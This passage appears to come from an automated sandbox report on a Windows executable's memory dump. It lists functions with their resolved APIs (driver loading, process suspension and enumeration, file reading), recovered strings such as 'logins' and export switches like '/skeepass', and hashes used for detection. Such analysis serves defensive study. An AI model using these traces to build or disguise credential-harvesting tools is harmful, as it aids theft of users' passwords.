                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                  Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                  • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                  • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                  • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                  • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                  Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1043902810-0
                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                  Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                  • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                  • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                  Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                  • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                  • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                  • API String ID: 3330709923-517860148
                                                                                                                  • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                  • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                  Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                                                  • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                  • String ID: logins$null
                                                                                                                  • API String ID: 2148543256-2163367763
                                                                                                                  • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                  • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                  Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: ---
                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                  • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                  • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                  Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010922700-0
                                                                                                                  • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                  • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                  Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                                  • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                  • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                  Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                  • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                  • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                  Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                  • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                  • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                  Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
